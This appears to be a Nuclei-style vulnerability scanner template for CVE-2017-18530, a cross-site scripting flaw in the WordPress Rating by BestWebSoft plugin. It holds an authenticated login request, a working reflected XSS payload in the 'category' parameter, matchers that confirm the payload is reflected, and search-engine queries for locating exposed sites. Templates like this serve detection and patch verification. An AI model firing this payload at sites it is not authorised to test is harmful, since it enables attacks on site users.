56 lines
2.1 KiB
YAML
56 lines
2.1 KiB
YAML
id: CVE-2017-18530
|
|
|
|
info:
|
|
name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting
|
|
author: luisfelipe146
|
|
severity: medium
|
|
description: |
|
|
The rating-bws plugin before 0.2 for WordPress has multiple XSS issues.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18530
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530
|
|
- https://wordpress.org/plugins/rating-bws/#developers
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-18530
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00088
|
|
epss-percentile: 0.36836
|
|
cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: bestwebsoft
|
|
product: rating
|
|
framework: wordpress
|
|
shodan-query: http.html:/wp-content/plugins/rating-bws/
|
|
fofa-query: body=/wp-content/plugins/rating-bws/
|
|
publicwww-query: "/wp-content/plugins/rating-bws/"
|
|
tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
|
|
- 'contains(body_3, "Rating by BestWebSoft")'
|
|
condition: and
|
|
# digest: 4a0a0047304502210091d8aac6a707f173c291302675374aa0d10f520b5c55af53dd46b367bbbddad602204382953b0ec8e5756a2b9463836ff893ad60a694779540f84999a47e50450d1d:922c64590222798bb761d5b6d8e72950 |